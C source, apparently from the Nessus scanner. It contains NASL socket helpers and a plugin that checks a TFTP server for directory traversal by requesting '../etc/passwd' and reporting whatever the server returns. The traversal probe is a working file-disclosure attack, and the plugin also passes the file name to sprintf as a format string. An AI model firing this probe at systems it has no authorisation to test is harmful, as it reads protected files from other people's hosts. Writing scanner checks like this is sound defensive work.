/*
* Opening a UDP socket is a little more tricky, since
* UDP works in a way which is different from TCP...
*
* Our goal is to hide this difference for the end-user
*/
tree_cell * nasl_open_sock_udp(lex_ctxt * lexic)
{
int soc;
tree_cell * retc;
int port;
struct sockaddr_in soca;
struct arglist * script_infos = lexic->script_infos;
struct in_addr * ia;
port = get_int_var_by_num(lexic, 0, -1);
if(port < 0)
return NULL;
ia = plug_get_host_ip(script_infos);
bzero(&soca, sizeof(soca));
soca.sin_addr.s_addr = ia->s_addr;
soca.sin_port = htons(port);
soca.sin_family = AF_INET;
soc = socket(AF_INET, SOCK_DGRAM, 0);
add_socket(script_infos, soc);
set_socket_source_addr(soc, 0);
connect(soc, (struct sockaddr*)&soca, sizeof(soca));
retc = alloc_tree_cell(0, NULL);
retc->type = CONST_INT;
retc->x.i_val = soc < 0 ? 0 : soc;
return retc;
}
static tree_cell * nasl_open_privileged_socket(lex_ctxt * lexic, int proto)
{
struct arglist * script_infos = lexic->script_infos;
int sport, current_sport = -1;
int dport;
int sock;
int e, err;
struct sockaddr_in addr, daddr;
struct in_addr * p;
int to = get_int_local_var_by_name(lexic, "timeout", lexic->recv_timeout);
tree_cell * retc;
struct timeval tv;
fd_set rd;
int opt, opt_sz;
sport = get_int_local_var_by_name(lexic, "sport", -1);
dport = get_int_local_var_by_name(lexic, "dport", -1);
if(dport <= 0)
{
nasl_perror(lexic, "open_private_socket: missing or undefined parameter dport!\n");
return NULL;
}
if(sport < 0) current_sport = 1023;
restart:
bzero(&addr, sizeof(addr));
if(proto == IPPROTO_TCP)
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
else
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
/*
* We will bind to a privileged port. Let's declare
* our socket ready for reuse
*/
if(sock < 0)
return NULL;
add_socket(script_infos, sock);
tryagain :
if ( current_sport < 128 ) return NULL;
e = set_socket_source_addr(sock, sport > 0 ? sport : current_sport--);
/*
* bind() failed - try again on a lower port
*/
if(e < 0)
{
closesocket ( sock );
if(sport > 0)
return NULL;
else
goto tryagain;
}
/*
* Connect to the other end
*/
p = plug_get_host_ip(script_infos);
bzero(&daddr, sizeof(daddr));
daddr.sin_addr = *p;
daddr.sin_port = htons(dport);
daddr.sin_family = AF_INET;
unblock_socket(sock);
e = connect(sock, (struct sockaddr*)&daddr, sizeof(daddr));
if ( e < 0 )
{
err = WSAGetLastError();
if ( err == WSAEADDRINUSE || err == WSAEADDRNOTAVAIL )
{
closesocket(sock);
if ( sport < 0 )
goto restart;
else
return NULL;
}
}
do {
tv.tv_sec = to;
tv.tv_usec = 0;
FD_ZERO(&rd);
FD_SET(sock, &rd);
e = select(sock + 1, NULL, &rd, NULL, to > 0 ? &tv:NULL);
err = WSAGetLastError();
} while ( e < 0 && err == WSAEINTR );
block_socket(sock);
opt_sz = sizeof(opt);
if ( getsockopt(sock, SOL_SOCKET, SO_ERROR, &opt, &opt_sz) < 0 )
{
fprintf(stderr, "[%d] open_priv_sock()->getsockopt() failed : %s\n", getpid(), strerror(errno));
closesocket(sock);
return NULL;
}
switch ( opt )
{
case WSAEADDRINUSE:
case WSAEADDRNOTAVAIL:
closesocket ( sock );
if ( sport < 0 )
goto restart;
else
return FAKE_CELL;
case 0:
break;
default:
closesocket ( sock );
return FAKE_CELL;
break;
}
if(proto == IPPROTO_TCP)
sock = nessus_register_connection(sock, NULL);
retc = alloc_tree_cell(0, NULL);
retc->type = CONST_INT;
retc->x.i_val = sock < 0 ? 0 : sock;
return retc;
}
PlugExport int plugin_run(struct arglist * env)
{
int soc;
struct sockaddr_in addr;
struct in_addr *p = plug_get_host_ip(env);
struct tftp_header * packet;
char * p_packet;
char * test_file = get_preference(env, "test_file");
char * read_timeout = get_preference(env, "checks_read_timeout");
char * file = NULL;
char * test_file_with_header;
int b;
fd_set read_set;
char * report;
int flaw = 0;
int len = sizeof(struct sockaddr_in);
struct timeval timeout = {0,0};
int flag;
if(read_timeout != NULL)
{
timeout.tv_sec = atoi(read_timeout);
}
if(timeout.tv_sec <= 0)
timeout.tv_sec = 5;
flag = (int)plug_get_key(env, "tftp/get_file");
if(flag)return(0);
if ( test_file == NULL )
test_file = strdup("/etc/passwd");
p_packet = emalloc(512 + strlen(test_file));
packet = (struct tftp_header *)p_packet;
packet->th_opcode=htons(RRQ);
test_file_with_header = emalloc(strlen(test_file)+20);
sprintf(test_file_with_header, "..%s", test_file);
sprintf(packet->th_stuff, test_file_with_header);
sprintf(packet->th_stuff+strlen(test_file_with_header)+1,"octet");
soc = socket(AF_INET, SOCK_DGRAM, 0);
set_socket_source_addr( soc, 0 );
addr.sin_family = AF_INET;
addr.sin_addr = *p;
addr.sin_port = htons(69);
connect(soc,( struct sockaddr*) &addr, sizeof(addr));
b = send(soc, packet, 22, 0);
addr.sin_addr = *p;
addr.sin_port = 0;
b=512;
while(b==512)
{
unsigned short block;
addr.sin_addr = *p;
addr.sin_port = 0;
bzero(packet, 512);
FD_ZERO(&read_set);
FD_SET(soc, &read_set);
select(soc+1, &read_set, NULL, NULL, &timeout);
if(!FD_ISSET(soc, &read_set))break;
b = recv(soc,packet, 512, 0);
if ( b <= sizeof(struct tftp_header))
exit(0);
if(ntohs(packet->th_opcode)==3)
{
/* We receive some data : there is a flaw */
char tmp[512];
char * tmp2;
flaw++;
snprintf(tmp, sizeof(tmp), "%s", packet->th_msg);
if( file == NULL )
tmp2 = emalloc(sizeof(tmp)+1);
else
tmp2 = emalloc(strlen(file)+sizeof(tmp)+1);
if( file == NULL )
strncpy(tmp2, tmp, strlen(tmp));
else
snprintf(tmp2, sizeof(tmp) + 1, "%s%s", file,tmp);
if(file != NULL )
efree(&file);
file = emalloc(strlen(tmp2) + 1);
strncpy(file, tmp2, strlen(tmp2));
efree(&tmp2);
}
else break;
block = ntohs(packet->th_block);
bzero(packet, 512);
packet->th_opcode = htons(04);
packet->th_block = htons(block);
send(soc, packet, 4, 0);
}
efree(&test_file_with_header);
if(flaw)
{
report = emalloc(255 + strlen(file) + strlen(test_file));
sprintf(report, "It was possible to retrieve the file %s\n\
through tftp by appending '..' in front of its name.\n\
Here is what we could grab : \n%s\n\n\
Solution : upgrade your tftpd", test_file, file);
efree(&file);
post_hole_udp(env, 69,report);
}
return(0);
}
